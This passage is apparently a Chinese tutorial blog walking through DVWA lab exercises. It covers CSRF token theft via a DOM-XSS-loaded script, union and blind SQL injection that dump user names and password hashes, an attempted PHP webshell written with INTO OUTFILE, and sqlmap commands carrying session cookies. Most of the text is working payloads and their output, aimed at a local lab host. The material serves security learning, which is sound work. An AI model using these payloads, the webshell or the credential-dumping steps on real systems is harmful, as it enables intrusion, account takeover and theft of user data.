class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"password_new"</span> <span class="attr">value</span>=<span class="string">"fqyfqy"</span>&gt;</span></span><br><span class="line">   <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"password_conf"</span> <span class="attr">value</span>=<span class="string">"fqyfqy"</span>&gt;</span></span><br><span class="line">   <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"user_token"</span> <span class="attr">value</span>=<span class="string">""</span>&gt;</span></span><br><span class="line">   <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"Change"</span> <span class="attr">value</span>=<span class="string">"Change"</span>&gt;</span></span><br><span class="line">   <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>当访问此网页时显示</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SecurityError: Permission denied to access property &quot;document&quot; on cross-origin object</span><br></pre></td></tr></table></figure>

<p>这表示禁止访问，因为不是同源。</p>
<p>下表给出了相对<code>http://a.xyz.com/dir/page.html</code>同源检测的示例: </p>
<table>
<thead>
<tr>
<th>URL</th>
<th>结果</th>
<th>原因</th>
</tr>
</thead>
<tbody><tr>
<td><code>http://a.xyz.com/dir2/other.html</code></td>
<td>成功</td>
<td></td>
</tr>
<tr>
<td><code>http://a.xyz.com/dir/inner/another.html</code></td>
<td>成功</td>
<td></td>
</tr>
<tr>
<td><code>https://a.xyz.com/secure.html</code></td>
<td>失败</td>
<td>不同协议 ( https和http )</td>
</tr>
<tr>
<td><code>http://a.xyz.com:81/dir/etc.html</code></td>
<td>失败</td>
<td>不同端口 ( 81和80)</td>
</tr>
<tr>
<td><code>http://a.opq.com/dir/other.html</code></td>
<td>失败</td>
<td>不同域名 ( xyz和opq)</td>
</tr>
</tbody></table>
<p>因此，在这里我们需要利用xss来实现或许token，high级别DOM型xss页面可以从url中加载js脚本，先构造一个xss脚本为<code>gettoken.js</code></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> theUrl = <span class="string">'http://quanyex.local.com/dvwa-master/vulnerabilities/csrf/'</span>;</span><br><span class="line"><span class="keyword">var</span> pass = <span class="string">'password'</span>;</span><br><span class="line">xmlhttp=<span class="keyword">new</span> XMLHttpRequest();</span><br><span class="line">xmlhttp.withCredentials = <span class="literal">true</span>;</span><br><span class="line"><span class="keyword">var</span> hacked = <span class="literal">false</span>;</span><br><span class="line">xmlhttp.onreadystatechange=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (xmlhttp.readyState==<span class="number">4</span> &amp;&amp; xmlhttp.status==<span class="number">200</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">var</span> text = xmlhttp.responseText;</span><br><span class="line">        <span class="keyword">var</span> regex = <span class="regexp">/user_token' value='(.*)' /</span>;</span><br><span class="line">        <span class="keyword">var</span> match = text.match(regex);</span><br><span class="line">        <span class="keyword">var</span> token = match[<span class="number">1</span>];</span><br><span class="line">        <span class="keyword">var</span> new_url = <span class="string">'http://quanyex.local.com/dvwa-master/vulnerabilities/csrf/?user_token='</span>+token+<span class="string">'&amp;password_new='</span>+pass+<span class="string">'&amp;password_conf='</span>+pass+<span class="string">'&amp;Change=Change'</span>;</span><br><span class="line">        <span class="keyword">if</span>(!hacked)&#123;</span><br><span class="line">            hacked = <span class="literal">true</span>;</span><br><span class="line">            xmlhttp.open(<span class="string">"GET"</span>, new_url, <span class="literal">false</span> );</span><br><span class="line">            xmlhttp.send();  </span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;;</span><br><span class="line">xmlhttp.open(<span class="string">"GET"</span>, theUrl );</span><br><span class="line">xmlhttp.send();</span><br></pre></td></tr></table></figure>

<p>然后构造URL诱导用户点击：</p>
<p><code>http://quanyex.local.com/dvwa-master/vulnerabilities/xss_d/?default=English#&lt;script src=&quot;http://quanyex.local.com/gettoken.js&quot;&gt;&lt;/script&gt;</code></p>
<p>这样一来就可以将密码改为password。</p>
<h1 id="SQl回显注入"><a href="#SQl回显注入" class="headerlink" title="SQl回显注入"></a>SQl回显注入</h1><p>手工注入思路：</p>
<p>1.判断是否存在注入，注入是字符型还是数字型</p>
<p>2.猜解SQL查询语句中的字段数</p>
<p>3.确定回显位置</p>
<p>4.获取当前数据库</p>
<p>5.获取数据库中的表</p>
<p>6.获取表中的字段名</p>
<p>7.得到数据</p>
<p>注入的poc：</p>
<p>1”  or “1” = “1</p>
<p>1’ or ‘1’ = ‘1</p>
<p>1 or  1 = 1</p>
<h2 id="low-3"><a href="#low-3" class="headerlink" title="low"></a>low</h2><h3 id="手工注入"><a href="#手工注入" class="headerlink" title="手工注入"></a>手工注入</h3><p>在输入框中输入 1正常显示数据，输入1‘ 报错，输入 1 and 1=1 正常显示，输入1 and 1=2 也正常显示，可以判断这里不是数字型，于是尝试 输入 1’ and ‘1‘ = ’1 正常显示数据，输入 1‘ and ’1‘ = ’2 没有报错却不显示数据，由此可以认定这里存在字符型注入。</p>
<p>利用order by和二分法来确定字段数，首先输入 1‘ order by 1 – 可以正常执行，接着输入1‘ order by 10 – 报错显示<code>Unknown column &#39;10&#39; in &#39;order clause&#39;</code>表示第八列不存在，于是尝试5，也失败了，接着尝试3，失败，然后尝试2，成功，说明<font color=red>该sql查询语句中</font>包含两个字段。</p>
<p>确定字段后用union select查看回显数据，在输入框中输入1’ union select 1,2 – 显示</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ID: 1&#39; union select 1,2 -- </span><br><span class="line">First name: admin</span><br><span class="line">Surname: admin</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select 1,2 -- </span><br><span class="line">First name: 1</span><br><span class="line">Surname: 2</span><br></pre></td></tr></table></figure>

<p>说明<font color=red>该sql查询语句为</font>select First name,Surname from 表 where ID=’id’</p>
<p>利用union select 确定数据库版本和当前数据库，在输入框中输入1’ union select database(),version() – </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ID: 1&#39; union select database(),version() -- </span><br><span class="line">First name: admin</span><br><span class="line">Surname: admin</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select database(),version() -- </span><br><span class="line">First name: dvwa</span><br><span class="line">Surname: 5.5.53</span><br></pre></td></tr></table></figure>

<p>接着查询表名，在输入框中输入1’ union select 1, table_name from information_schema.tables where table_schema = ‘dvwa’ – </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">ID: 1&#39; union select 1, table_name from information_schema.tables where table_schema &#x3D; &#39;dvwa&#39; -- </span><br><span class="line">First name: admin</span><br><span class="line">Surname: admin</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select 1, table_name from information_schema.tables where table_schema &#x3D; &#39;dvwa&#39; -- </span><br><span class="line">First name: 1</span><br><span class="line">Surname: guestbook</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select 1, table_name from information_schema.tables where table_schema &#x3D; &#39;dvwa&#39; -- </span><br><span class="line">First name: 1</span><br><span class="line">Surname: users</span><br></pre></td></tr></table></figure>

<p>可以看到查到两个表分别为guesbook和users，接着在输入框中输入1’ union select 1, column_name from information_schema.columns where table_name = ‘users’ – </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">ID: 1&#39; union select 1, column_name from information_schema.columns where table_name &#x3D; &#39;users&#39; -- </span><br><span class="line">First name: admin</span><br><span class="line">Surname: admin</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select 1, column_name from information_schema.columns where table_name &#x3D; &#39;users&#39; -- </span><br><span class="line">First name: 1</span><br><span class="line">Surname: user_id</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select 1, column_name from information_schema.columns where table_name &#x3D; &#39;users&#39; -- </span><br><span class="line">First name: 1</span><br><span class="line">Surname: first_name</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select 1, column_name from information_schema.columns where table_name &#x3D; &#39;users&#39; -- </span><br><span class="line">First name: 1</span><br><span class="line">Surname: last_name</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select 1, column_name from information_schema.columns where table_name &#x3D; &#39;users&#39; -- </span><br><span class="line">First name: 1</span><br><span class="line">Surname: user</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select 1, column_name from information_schema.columns where table_name &#x3D; &#39;users&#39; -- </span><br><span class="line">First name: 1</span><br><span class="line">Surname: password</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select 1, column_name from information_schema.columns where table_name &#x3D; &#39;users&#39; -- </span><br><span class="line">First name: 1</span><br><span class="line">Surname: avatar</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select 1, column_name from information_schema.columns where table_name &#x3D; &#39;users&#39; -- </span><br><span class="line">First name: 1</span><br><span class="line">Surname: last_login</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select 1, column_name from information_schema.columns where table_name &#x3D; &#39;users&#39; -- </span><br><span class="line">First name: 1</span><br><span class="line">Surname: failed_login</span><br></pre></td></tr></table></figure>

<p>可以发现user和password两个敏感字段，在输入框中输入1’ union select user, password from users – </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">ID: 1&#39; union select user, password from users -- </span><br><span class="line">First name: admin</span><br><span class="line">Surname: admin</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select user, password from users -- </span><br><span class="line">First name: admin</span><br><span class="line">Surname: 5f4dcc3b5aa765d61d8327deb882cf99</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select user, password from users -- </span><br><span class="line">First name: gordonb</span><br><span class="line">Surname: e99a18c428cb38d5f260853678922e03</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select user, password from users -- </span><br><span class="line">First name: 1337</span><br><span class="line">Surname: 8d3533d75ae2c3966d7e0d4fcc69216b</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select user, password from users -- </span><br><span class="line">First name: pablo</span><br><span class="line">Surname: 0d107d09f5bbe40cade3de5c71e9e9b7</span><br><span class="line"></span><br><span class="line">ID: 1&#39; union select user, password from users -- </span><br><span class="line">First name: smithy</span><br><span class="line">Surname: 5f4dcc3b5aa765d61d8327deb882cf99</span><br></pre></td></tr></table></figure>

<p>打开网站<code>www.cmd5.com</code>破解密码。</p>
<p>可以利用该漏洞获取系统的敏感信息，在输入框中输入1’ union select 1, load_file(‘c:\windows\win.ini’) – </p>
<p>显示空，这是因为<font color =red>mysql的secure_file_priv的新特性。</font>解决方法如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">mysql新版本下 secure_file_priv字段：secure_file_priv参数是用来限制LOAD DATA,SELECT ...OUTFILE, and LOAD_FILE()传到哪个指定目录的。</span><br><span class="line"></span><br><span class="line">ure_file_priv的值为null,表示限制mysqld不允许导入&#x2F;导出</span><br><span class="line"></span><br><span class="line">当secure_file_priv的值为&#x2F;tmp&#x2F;，表示限制mysqld的导入|导出只能发生在&#x2F;tmp&#x2F;目录下</span><br><span class="line"></span><br><span class="line">当secure_file_priv的值没有具体值时，表示不对mysqld的导入|导出做限制。</span><br><span class="line"></span><br><span class="line">资料地址: https:&#x2F;&#x2F;segmentfault.com&#x2F;a&#x2F;1190000009333563</span><br><span class="line"></span><br><span class="line">解决办法：</span><br><span class="line"></span><br><span class="line">&gt;&gt; show global variables like &#39;%secure%&#39;;</span><br><span class="line"></span><br><span class="line">默认的为NULL。</span><br><span class="line"></span><br><span class="line">修改mysql.ini或my.ini文件，在[mysqld]下加入</span><br><span class="line"></span><br><span class="line">secure_file_priv &#x3D;</span><br><span class="line"></span><br><span class="line">保存重启mysql即可。</span><br></pre></td></tr></table></figure>

<p>还可以利用该漏洞写文件，在输入框中输入xx’ union select “xx”, “xx” into outfile ‘xx’ – 通过引发异常导致报错来得到web目录 <code>E:\phpstudy\WWW\DVWAmaster\vulnerabilities\sqli\source\low.php</code>接着在输入框中输入xx’ union select “&lt;?php @eval($_GET[‘cmd’]?);”, “webshell” into outfile ‘E:\phpstudy\WWW\DVWAmaster\cmd.php’ –    <font  color=red>没有执行成功</font>显示：Can’t create/write to file ‘E:\phpstudy\WWW\DVWAmaster\cmd.php’ (Errcode: 2)</p>
<h3 id="sqlmap"><a href="#sqlmap" class="headerlink" title="sqlmap"></a>sqlmap</h3><p>进入cmd，e: ；cd sqlmap；使用sqlmap命令：<code>sqlmap.py -u &quot;http://quanyex.local.com/dvwa-master/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot; --cookie &quot;security=low;PHPSESSID=2ghptdtrr6159ml6gt8ik7bu05&quot;</code>执行结果如下：</p>
<p><img src="http://lulu.izliang.com/yty/11bbd74c9ab776532a4f84dd860195b.png" alt=""></p>
<p>继续查询当前用户和当前数据库<code>sqlmap.py -u &quot;http://quanyex.local.com/dvwa-master/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot; --cookie &quot;security=low;PHPSESSID=2ghptdtrr6159ml6gt8ik7bu05&quot; --current-user --current-db</code></p>
<p><img src="http://lulu.izliang.com/yty/4c9040402a1505bdaa890ce28cb1afb.png" alt=""></p>
<p>查询数据库中表<code>sqlmap.py -u &quot;http://quanyex.local.com/dvwa-master/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot; --cookie &quot;security=low;PHPSESSID=2ghptdtrr6159ml6gt8ik7bu05&quot; -D dvwa --tables</code></p>
<p><img src="http://lulu.izliang.com/yty/ea2a7976dda046eeabe1b582ab40a94.png" alt=""></p>
<p>查询字段名<code>sqlmap.py -u &quot;http://quanyex.local.com/dvwa-master/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot; --cookie &quot;security=low;PHPSESSID=2ghptdtrr6159ml6gt8ik7bu05&quot; -D dvwa -T users --columns</code>    <font color=red>注意这里要选择线程数来决定他的快慢</font></p>
<p><img src="http://lulu.izliang.com/yty/f2014522d434768aa62c8cb912c0a30.png" alt=""></p>
<p>查询用户名和密码<code>sqlmap.py -u &quot;http://quanyex.local.com/dvwa-master/vulnerabilities/sqli/?id=1&amp;Submit=Submit#&quot; --cookie &quot;security=low;PHPSESSID=2ghptdtrr6159ml6gt8ik7bu05&quot; -D dvwa -T users -C &quot;user,password&quot; --dump</code> </p>
<h2 id="medium-4"><a href="#medium-4" class="headerlink" title="medium"></a>medium</h2><h3 id="手工注入-1"><a href="#手工注入-1" class="headerlink" title="手工注入"></a>手工注入</h3><p><strong>在sql注入中遇到转义字符串单引号或双引号的情况下可以使用 hex编码进行绕过。</strong></p>
<p>选择中等难度之后可以看到，参数不再是输入的方式而是通过选择，传递方式也变成post方式，利用burpsuite抓包然后修改参数值来实现sql注入，首先将参数改为<code>1’ and ‘1’ = ‘2</code>，报错，可以看到单引号被转义了。尝试</p>
<p><code>1 and 1 = 2</code>发现可以执行但没有数据，说明这里存在数字型注入。输入 <code>1 or 1 = 1</code>发现成功显示所有数据。</p>
<p>输入<code>1 union select user,password from users --</code>果然获取到了用户名和密码</p>
<p><font color=red>注意：</font>当我们通过手工注入查询表名的时候语句为 <code>1 union select 1,table_name from information_schema.tables where table_schema = &#39;dvwa&#39; --</code>这条语句中dvwa这里含有单引号，通过之前的判断我们知道，单引号会被转义，所以在这里我们需要使用hex编码绕过。于是将通过hackbar将dvwa进行hex编码为64767761，前面加上0x，表明是16位的编码，最终为0x64767761。所以语句为<code>1 union select 1,table_name from information_schema.tables where table_schema = 0x64767761 --</code>，执行后成功爆出表名</p>
<h3 id="sqlmap-1"><a href="#sqlmap-1" class="headerlink" title="sqlmap"></a>sqlmap</h3><p>大体与之前一致，但是这里需要注意，因为这次传递参数的方式改变为了post方式所以参数不能写在URL中，应该使用–data来将参数写入，因此语句为：<code>sqlmap.py -u &quot;http://quanyex.local.com/dvwa-master/vulnerabilities/sqli/&quot; --data &quot;id=1$Submit=Submit&quot; --cookie &quot;security=medium;PHPSESSID=2ghptdtrr6159ml6gt8ik7bu05&quot;</code></p>
<h2 id="high-4"><a href="#high-4" class="headerlink" title="high"></a>high</h2><h3 id="手工注入-2"><a href="#手工注入-2" class="headerlink" title="手工注入"></a>手工注入</h3><p>进入high级别发现，显示和输入不在一个页面了，在输入页面尝试<code>1&#39; and &#39;1&#39; = &#39;2</code>发现可以执行但显示界面没有数据显示，说明存在字符型注入。剩下的与low方法类似。业务场景虽然改变，但是没什么影响。</p>
<h3 id="sqlmap-2"><a href="#sqlmap-2" class="headerlink" title="sqlmap"></a>sqlmap</h3><p>因为输入和显示页面不是同一个页面所以代码也要相应改变。使用–second-url来表明显示页面，所以代码为</p>
<p><code>sqlmap.py -u &quot;http://quanyex.local.com/dvwa-master/vulnerabilities/sqli/session-input.php#&quot; --data &quot;id=1$Submit=Submit&quot; --cookie &quot;security=high;PHPSESSID=2ghptdtrr6159ml6gt8ik7bu05&quot; --second-url &quot;http://quanyex.local.com/dvwa-master/vulnerabilities/sqli/&quot;</code>这样就可以正常注入。</p>
<h1 id="SQL盲注"><a href="#SQL盲注" class="headerlink" title="SQL盲注"></a>SQL盲注</h1><p>注入的poc：</p>
<p>1”  and “1” = “2</p>
<p>1’ and ‘1’ = ‘2</p>
<p>1 and  1 = 2</p>
<p>用到的函数：</p>
<p>length(str)</p>
<p>substr(expression,start,length)  获取字符串（原始字符串，子串开始位置，子串长度） </p>
<p>ascii(string)  获取第一个字符的ASCII数值（字符串）<font color=red>注意：单字符ASCII码范围0-127</font></p>
<p>count()     count() 函数返回匹配指定条件的行数。 用法select count()</p>
<p>if(expr1,expr2,expr3)  如果expr1为真，返回expr2，否则返回expr3.</p>
<p>sleep(N)          休眠（n秒）</p>
<p>benchmark(count,expr)      重复计算（次数为count，表达式）次数不要太多容易打挂服务器。</p>
<h2 id="low-4"><a href="#low-4" class="headerlink" title="low"></a>low</h2><h3 id="手工注入-3"><a href="#手工注入-3" class="headerlink" title="手工注入"></a>手工注入</h3><p>输入框中输入1，显示存在，输入1 and  1=2 显示存在，输入1’ and ‘1’ = ‘2 显示不存在。说明这里存在字符型注入漏洞是由单引号闭合的。首先来判断数据库的长度，</p>
<p>输入<code>1&#39; and length(database())&gt;1 --</code>此时显示存在，</p>
<p>继续<code>1&#39; and length(database())&gt;10 --</code>显示不存在，</p>
<p>二分法<code>1&#39; and length(database())&gt;5 --</code>不存在，</p>
<p><code>1&#39; and length(database())&gt;3 --</code>存在，说明长度为4。</p>
<p><strong>接下来要确定字符串的内容，</strong></p>
<p>输入<code>1&#39; and ascii(substr(database(),1,1))&gt;64 --</code>显示存在，说明第一个字符ASCII码范围是65-127</p>
<p>二分法，<code>1&#39; and ascii(substr(database(),1,1))&gt;96 --</code>显示存在，</p>
<p><code>1&#39; and ascii(substr(database(),1,1))&gt;112 --</code>显示不存在，</p>
<p><code>1&#39; and ascii(substr(database(),1,1))&gt;104 --</code>显示不存在，</p>
<p><code>1&#39; and ascii(substr(database(),1,1))&gt;100 --</code>显示不存在，</p>
<p><code>1&#39; and ascii(substr(database(),1,1))&gt;98 --</code>显示存在，</p>
<p><code>1&#39; and ascii(substr(database(),1,1))&gt;99 --</code>显示存在，</p>
<p>说明第一个字符的ASCII码为100，对应的字符为d，同样的方法确定第二个字符为v，第三个字符为w，第四个字符为a，确定数据库名为dvwa。</p>
<p><strong>接着猜解数据库中的表名：（先得到表的个数，在猜解表名）</strong></p>
<p><code>1&#39; and (select count(table_name) from information_schema.tables where table_schema=&#39;dvwa&#39;)&gt;10 --</code>不存在</p>
<p><code>1&#39; and (select count(table_name) from information_schema.tables where table_schema=&#39;dvwa&#39;)&gt;5 --</code>不存在</p>
<p><code>1&#39; and (select count(table_name) from information_schema.tables where table_schema=&#39;dvwa&#39;)&gt;3 --</code>不存在</p>
<p><code>1&#39; and (select count(table_name) from information_schema.tables where table_schema=&#39;dvwa&#39;)&gt;2 --</code>不存在</p>
<p><code>1&#39; and (select count(table_name) from information_schema.tables where table_schema=&#39;dvwa&#39;)&gt;1 --</code>存在</p>
<p>所以表的数目为2，接着猜解表名：（表名称长度）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># 1.查询列出当前连接数据库下的所有表名称</span><br><span class="line">select table_name from information_schema.tables where table_schema&#x3D;database()</span><br><span class="line"># 2.列出当前连接数据库中的第1个表名称</span><br><span class="line">select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1</span><br><span class="line"># 3.以当前连接数据库第1个表的名称作为字符串，从该字符串的第一个字符开始截取其全部字符</span><br><span class="line">substr((select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1),1)</span><br><span class="line"># 4.计算所截取当前连接数据库第1个表名称作为字符串的长度值</span><br><span class="line">length(substr((select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1),1))</span><br><span class="line"># 5.将当前连接数据库第1个表名称长度与某个值比较作为判断条件，联合and逻辑构造特定的sql语句进行查询，根据查询返回结果猜解表名称的长度值</span><br><span class="line">1&#39; and length(substr((select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1),1))&gt;10 --</span><br></pre></td></tr></table></figure>

<p><code>1&#39; and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))&gt;10 --</code>不存在</p>
<p><code>1&#39; and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))&gt;5 --</code>存在</p>
<p><code>1&#39; and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))&gt;8 --</code>存在</p>
<p><code>1&#39; and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))&gt;9 --</code>不存在</p>
<p>所以第一个表名的长度为9，接着猜解名称</p>
<p><code>1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;64 --</code>存在</p>
<p><code>1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;96 --</code>存在</p>
<p><code>1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;112 --</code>不存在</p>
<p><code>1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;104 --</code>不存在</p>
<p><code>1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;100 --</code>存在</p>
<p><code>1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;102 --</code>存在</p>
<p><code>1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;103 --</code>不存在</p>
<p>说明第一个字符ascii码为103，对应g，照此依次破解为u、e、s、t、b、o、o、k ，然后破解第二个表长度为5，表名为users</p>
<p><strong>猜解字段名：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># 判断[dvwa库-users表]中的字段数目</span><br><span class="line">(select count(column_name) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;&#39;users&#39;)&#x3D;xxx</span><br><span class="line"># 判断在[dvwa库-users表]中是否存在某个字段（调整column_name取值进行尝试匹配）</span><br><span class="line">(select count(*) from information_schema.columns where table_schema&#x3D;database() and table_name&#x3D;&#39;users&#39; and column_name&#x3D;&#39;xxx&#39;)&#x3D;1</span><br><span class="line"># 猜解第i+1个字段的字符长度</span><br><span class="line">length(substr((select column_name from information_shchema.columns limit $i$,1),1))&#x3D;xxx</span><br><span class="line"># 猜解第i+1个字段的字符组成，j代表组成字符的位置（从左至右第1&#x2F;2&#x2F;...号位）</span><br><span class="line">ascii(substr((select column_name from information_schema.columns limit $i$,1),$j$,1))&#x3D;xxx</span><br></pre></td></tr></table></figure>

<p>猜解字段个数：</p>
<p><code>1&#39; and (select count(column_name) from information_schema.columns where table_schema=database() and table_name=&#39;users&#39;)&gt;10 --</code>不存在</p>
<p><code>1&#39; and (select count(column_name) from information_schema.columns where table_schema=database() and table_name=&#39;users&#39;)&gt;5 --</code>存在</p>
<p><code>1&#39; and (select count(column_name) from information_schema.columns where table_schema=database() and table_name=&#39;users&#39;)&gt;8 --</code>不存在</p>
<p><code>1&#39; and (select count(column_name) from information_schema.columns where table_schema=database() and table_name=&#39;users&#39;)&gt;7 --</code>存在</p>
<p>说明字段个数为8，接着猜解字段名，猜想数据库中可能保存的字段名称<br> 用户名：username/user_name/uname/u_name/user/name/…<br> 密码：password/pass_word/pwd/pass/…</p>
<p><code>1&#39; and (select count(*) from information_schema.columns where table_schema=database() and table_name=&#39;users&#39; and column_name=&#39;username&#39;)=1 --</code>不存在</p>
<p><code>1&#39; and (select count(*) from information_schema.columns where table_schema=database() and table_name=&#39;users&#39; and column_name=&#39;user&#39;)=1 --</code>存在</p>
<p><code>1&#39; and (select count(*) from information_schema.columns where table_schema=database() and table_name=&#39;users&#39; and column_name=&#39;password&#39;)=1 --</code>存在</p>
<p>说明字段user和password存在。</p>
<p><strong>获取字段值：</strong></p>
<p><code>1&#39; and length(substr((select user from users limit 0,1),1))&gt;10 --</code>不存在</p>
<p><code>1&#39; and length(substr((select user from users limit 0,1),1))&gt;5 --</code>不存在</p>
<p><code>1&#39; and length(substr((select user from users limit 0,1),1))&gt;3 --</code>存在</p>
<p><code>1&#39; and length(substr((select user from users limit 0,1),1))&gt;4 --</code>存在</p>
<p>说明第一个用户名长度为5</p>
<p>……………………..</p>
<h3 id="sqlmap-3"><a href="#sqlmap-3" class="headerlink" title="sqlmap"></a>sqlmap</h3><p>sqlmap -v  1-6参数可以输出详细信息</p>
<p>获取当前数据库名：<code>sqlmap.py -u &quot;http://quanyex.local.com/dvwa-master/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#&quot; -p&quot;id&quot; --cookie &quot;security=low;PHPSESSID=2ghptdtrr6159ml6gt8ik7bu05&quot; --current-db -v 3</code></p>
<p><img src="http://lulu.izliang.com/yty/sqlmap1.png" alt=""></p>
